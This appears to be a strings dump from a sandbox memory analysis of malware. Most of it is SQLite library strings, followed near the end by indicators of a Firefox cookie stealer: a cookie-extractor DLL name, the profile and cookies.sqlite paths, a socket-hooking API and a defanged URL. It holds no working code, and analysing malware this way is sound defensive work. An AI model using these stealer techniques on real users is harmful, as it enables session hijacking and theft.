Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
%s: %s
%s: %s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
no such collation sequence: %s
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_version
sqlite_version
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
PRIMARY KEY must be unique
PRIMARY KEY must be unique
sqlite3_extension_init
sqlite3_extension_init
unable to open shared library [%s]
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
error during initialization: %s
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s.%s
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s SUBQUERY %d
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
SQL logic error or missing database
SQL logic error or missing database
unknown operation
unknown operation
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
CPU Time: user %f sys %f
(%d) %s
(%d) %s
%*s = %s
%*s = %s
%-*.*s%s
%-*.*s%s
INSERT INTO %s VALUES(
INSERT INTO %s VALUES(
%sNULL
%sNULL
/**** ERROR: (%d) %s *****/
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache hits: %d
Page cache misses: %d
Page cache misses: %d
Page cache writes: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Fullscan Steps: %d
Sort Operations: %d
Sort Operations: %d
Autoindex Inserts: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
/****** %s ******/
%s ORDER BY rowid DESC
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
insert SQL insert statements for TABLE
list Values delimited by .separator string
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: cannot open "%s"
Error: %s
Error: %s
PRAGMA foreign_keys=OFF;
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
import
Error: non-null separator required for import
Error: non-null separator required for import
SELECT * FROM %s
SELECT * FROM %s
INSERT INTO %s VALUES(?
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot open pipe "%s"
Error: cannot write to "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
%s%-*s
iskeyword
iskeyword
ambiguous option name: "%s"
ambiguous option name: "%s"
Error: invalid testctrl option: %s
Error: invalid testctrl option: %s
%d (0xx)
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
Error: CLI support for testctrl %s not implemented
SQLite %s %s
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
Error: near line %d:
%s %s
%s %s
Error: incomplete SQL: %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s: Error: cannot locate your home directory
%s/.sqliterc
%s/.sqliterc
-- Loading resources from %s
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
FILENAME is the name of an SQLite database. A new database is created
sqlite>
sqlite>
SQLite header and source version mismatch
SQLite header and source version mismatch
no such VFS: "%s"
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s: Error: unknown option: %s
%s/.sqlite_history
%s/.sqlite_history
SQLite version %s %.19s
SQLite version %s %.19s
Enter ".help" for instructions
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
Enter SQL statements terminated with a ";"
zcÁ
zcÁ
%System%\regsvr32.exe
%System%\regsvr32.exe
GetCPInfo
GetCPInfo
]
]
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
KERNEL32.DLL
KERNEL32.DLL
ole32.dll
ole32.dll
ffcookieextractor.dll
ffcookieextractor.dll
_getFirefoxCookie
_getFirefoxCookie
mscoree.dll
mscoree.dll
nKERNEL32.DLL
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
%AppData%\Mozilla\Firefox
%AppData%\Mozilla\Firefox
\profiles.ini
\profiles.ini
\cookies.sqlite
\cookies.sqlite
Kernel32.dll
Kernel32.dll
regsvr32.exe_3384_rwx_01000000_00005000:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration
new.exe_3664_rwx_00130000_00047000:
.text
.text
`.data
`.data
.reloc
.reloc
update.exe
update.exe
config.bin
config.bin
%0&!%F
%0&!%F
?)500>(8
?)500>(8
7-52&
7-52&
,%)4.5(";$2
,%)4.5(";$2
:'$!71689/
:'$!71689/
-0=).?,7
-0=).?,7
60/)4:5
60/)4:5
-*?)2
-*?)2
>5;(4-2>)4 }744
>5;(4-2>)4 }744
"?5&"5%3%/
"?5&"5%3%/
398>7="'
398>7="'
;!)5:. =##
;!)5:. =##
Z#%xDVOE
Z#%xDVOE
(00(7> 59
(00(7> 59
$6>59$=1
$6>59$=1
^EXKSQN_^%X Sf
^EXKSQN_^%X Sf
PR_OpenTCPSocket
PR_OpenTCPSocket
%s%s%s
%s%s%s
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
ole32.dll
ole32.dll
gdi32.dll
gdi32.dll
?
?
value=[%s], code=[%s]
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.1
HTTP/1.0
HTTP/1.0
hXXps://
hXXps://
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
HTTP/1.
HTTP/1.
X-WebKit-CSP
X-WebKit-CSP
